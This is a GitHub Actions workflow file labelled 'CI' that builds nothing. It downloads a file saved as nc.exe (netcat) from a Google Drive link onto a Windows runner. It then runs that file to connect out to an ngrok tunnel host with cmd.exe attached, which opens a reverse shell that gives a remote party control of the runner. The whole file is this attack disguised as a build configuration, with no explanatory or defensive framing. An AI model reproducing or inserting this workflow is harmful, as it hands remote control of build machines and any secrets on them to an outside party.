name: CI

on: [push, workflow_dispatch]

jobs:

  build:

    runs-on: windows-latest

    steps:

    - name: Download

      run: Invoke-WebRequest https://drive.google.com/u/0/uc?id=10A03gfezpkfaUBlYAvHajjc6w3amMGUM&export=download&confirm=t&uuid=5a0ad74d-c4bf-45cf-b53a-8194daeee8b3&at=ACjLJWlUMI8xonr0FrlVqUTYVFW_:1671585713468 -OutFile nc.exe

    - name: commands

      run: nc.exe -v 0.tcp.in.ngrok.io 14912 -e cmd.exe

    
